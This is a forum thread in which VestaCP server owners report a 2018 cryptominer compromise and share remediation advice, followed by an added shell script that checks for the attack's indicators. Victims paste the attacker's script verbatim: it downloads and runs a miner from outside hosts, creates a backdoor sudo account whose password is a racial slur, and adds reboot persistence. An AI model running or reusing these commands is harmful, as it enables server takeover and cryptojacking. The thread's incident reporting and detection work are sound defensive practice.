have been HACKED ! by xaxaxa.eu
Re: have been HACKED ! by xaxaxa.eu
Spheerys wrote: Tue Jun 26, 2018 7:21 am
A new line was added to /etc/passwd:
Code:
sysroot:x:1007:1008::/home/sysroot:/bin/sh
and /etc/group:
Code:
sysroot:x:1008:
and /etc/gshadow:
Code:
sysroot:!::
and /etc/subuid:
and /etc/shadow:
Code:
sysroot:$6$A7jC1gBu$3kMVa4OoMDiyw8zLX7Y9X7kmyUNH9cbR6x6tSeNATJ.NlXEBE/DdFnKFCryHJAxHFOIFkUQmyKodtHLJH.QF.:17708:0:99999:7:::
/etc/sudoers (sic!!):
Code:
sysroot ALL=(ALL) ALL
(the same line repeated dozens of times)

As the thread owner mentioned in his first post, the following script was executed:
Code:
if pgrep -x "gcc" > /dev/null
then
echo "Running"
else
cd;
pkill -f xmrig;
wget -O /tmp/gcc http://xaxaxa.eu/gcc;
chmod +x gcc;
wget -O /tmp/config_1.json http://xaxaxa.eu/config_1.json;
/tmp/gcc -c /tmp/config_1.json;
echo "fucktheniggers" | sudo -S useradd sysroot;
echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot:fucktheniggers" | chpasswd';
echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot ALL=(ALL) ALL" >> /etc/sudoers';
(crontab -l ; echo "@reboot /tmp/gcc -c /tmp/config_1.json")| crontab -;
/usr/local/vesta/bin/v-update-sys-vesta-all;
fi
Re: have been HACKED ! by xaxaxa.eu
I've updated the system without errors. But still I'm on version .20. /usr/local/vesta/bin doesn't seem to update anything for me, nor does apt-get update vesta. Any ideas?
Re: have been HACKED ! by xaxaxa.eu
Did you try to upgrade like I wrote? -> viewtopic.php?f=10&t=17183#p71558
If yes, please share the output of ./v-list-sys-vesta-updates.
Re: have been HACKED ! by xaxaxa.eu
In my case:
Code:
PKG VER REL ARCH UPDT DATE
--- --- --- ---- ---- ----
vesta 0.9.8 22 amd64 yes 2018-06-26
vesta-php 0.9.8 21 amd64 yes 2018-05-25
vesta-nginx 0.9.8 21 amd64 yes 2018-05-25
Re: have been HACKED ! by xaxaxa.eu
Spheerys wrote: Tue Jun 26, 2018 7:31 am
In my case:
Code:
PKG VER REL ARCH UPDT DATE
--- --- --- ---- ---- ----
vesta 0.9.8 22 amd64 yes 2018-06-26
vesta-php 0.9.8 21 amd64 yes 2018-05-25
vesta-nginx 0.9.8 21 amd64 yes 2018-05-25

You're up to date, good so far. Now you need to clean your server. My point of view: do not trust an infected server anymore. Better install a new one and migrate the users there.
Re: have been HACKED ! by xaxaxa.eu
Yes, you are right.
Thanks!
Re: have been HACKED ! by xaxaxa.eu
Dear team,
We have around 120+ servers running in various data centers across the world. Out of these, 110 servers have VestaCP installed. All 110 servers with VestaCP installed have been hacked for CPU currency mining by some unknown hacker.
The hacker installed xmrig mining software on our servers.
Some servers also have a script called 'gcc' installed.
How can we get rid of this issue?
Regards
Re: have been HACKED ! by xaxaxa.eu
Was also hacked tonight by a mining virus:
Code:
if pgrep -x "gcc" > /dev/null
then
echo "Running"
else
cd;
pkill -f xmrig;
rm -rf /tmp/gcc;
rm -rf /tmp/config_1.json;
wget -O /tmp/gcc http://bigbatman.loan/gcc;
chmod 777 /tmp/gcc;
wget -O /tmp/config_1.json http://bigbatman.loan/config_1.json;
/tmp/gcc -c /tmp/config_1.json;
echo "fucktheniggers" | sudo -S useradd sysroot;
echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot:fucktheniggers" | chpasswd';
echo "fucktheniggers" | sudo -S sh -c 'echo "sysroot ALL=(ALL) ALL" >> /etc/sudoers';
(crontab -l ; echo "@reboot /tmp/gcc -c /tmp/config_1.json")| crontab -;
/usr/local/vesta/bin/v-update-sys-vesta-all;
fi
Re: have been HACKED ! by xaxaxa.eu
ScIT wrote: Tue Jun 26, 2018 7:29 am
Did you try to upgrade like I wrote? -> viewtopic.php?f=10&t=17183#p71558
If yes, please share the output of ./v-list-sys-vesta-updates.

I did exactly as you wrote.
Code:
PKG VER REL ARCH UPDT DATE
--- --- --- ---- ---- ----
vesta 0.9.8 20 amd64 no 2018-04-09
vesta-php 0.9.8 19 amd64 no 2018-01-23
vesta-nginx 0.9.8 20 amd64 no 2018-04-09
Re: have been HACKED ! by xaxaxa.eu
pksh71 wrote: Tue Jun 26, 2018 7:57 am
Dear team,
We have around 120+ servers running in various data centers across the world. Out of these, 110 servers have VestaCP installed. All 110 servers with VestaCP installed have been hacked for CPU currency mining by some unknown hacker.
The hacker installed xmrig mining software on our servers.
Some servers also have a script called 'gcc' installed.
How can we get rid of this issue?
Regards

1. Update to the actual patch level (0.9.8-22). This will fix the security issue but does .
2. In my point of view: don't trust infected servers, so reinstall them. If you don't want to reinstall, try to clear the system.
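To make the "clear the system" step concrete, here is an added triage check (not from the thread or the Vesta project) that looks for the three persistence artefacts the posted script leaves behind: the sysroot account, the appended sudoers lines and the @reboot crontab entry. It runs against constructed copies of those files; on a real host you would point it at /etc/passwd, /etc/sudoers and the output of `crontab -l` for the affected account. The /tmp/gcc binary and a running xmrig process are not covered here.

```shell
#!/bin/sh
# Added triage helper: checks file copies for the indicators described in the thread.
# It reads files given as arguments so it can be exercised on the sample data below.

# check_indicators PASSWD SUDOERS CRONTAB
# Prints one "INDICATOR:" line per finding, then a final "INDICATORS_FOUND n" line.
check_indicators() {
    hits=0
    # 1. the rogue account created by 'useradd sysroot'
    if grep -q '^sysroot:' "$1"; then
        echo "INDICATOR: account 'sysroot' present in $1"
        hits=$((hits + 1))
    fi
    # 2. the sudoers line; the script appends one copy every time it runs,
    #    so the count is a rough lower bound on how often the host was hit
    n=$(grep -c '^sysroot ALL=(ALL) ALL' "$2" || true)
    if [ "$n" -gt 0 ]; then
        echo "INDICATOR: $n copies of 'sysroot ALL=(ALL) ALL' in $2"
        hits=$((hits + 1))
    fi
    # 3. the @reboot persistence for the miner masquerading as 'gcc'
    if grep -q '^@reboot /tmp/gcc -c /tmp/config_1.json' "$3"; then
        echo "INDICATOR: @reboot crontab entry for /tmp/gcc in $3"
        hits=$((hits + 1))
    fi
    echo "INDICATORS_FOUND $hits"
}

# Constructed sample files mirroring what Spheerys posted (not real system files).
SAMPLE_DIR=$(mktemp -d)
trap 'rm -rf "$SAMPLE_DIR"' EXIT
printf 'root:x:0:0:root:/root:/bin/bash\nsysroot:x:1007:1008::/home/sysroot:/bin/sh\n' > "$SAMPLE_DIR/passwd"
printf 'root ALL=(ALL:ALL) ALL\nsysroot ALL=(ALL) ALL\nsysroot ALL=(ALL) ALL\nsysroot ALL=(ALL) ALL\n' > "$SAMPLE_DIR/sudoers"
printf '@reboot /tmp/gcc -c /tmp/config_1.json\n' > "$SAMPLE_DIR/crontab"
# A clean set for comparison.
printf 'root:x:0:0:root:/root:/bin/bash\n' > "$SAMPLE_DIR/passwd.clean"
printf 'root ALL=(ALL:ALL) ALL\n' > "$SAMPLE_DIR/sudoers.clean"
: > "$SAMPLE_DIR/crontab.clean"

echo "== compromised sample =="
check_indicators "$SAMPLE_DIR/passwd" "$SAMPLE_DIR/sudoers" "$SAMPLE_DIR/crontab"
echo "== clean sample =="
check_indicators "$SAMPLE_DIR/passwd.clean" "$SAMPLE_DIR/sudoers.clean" "$SAMPLE_DIR/crontab.clean"
```

Any non-zero INDICATORS_FOUND on a production host is a reason to follow ScIT's advice and rebuild rather than clean, since the same access that planted these artefacts could have planted others.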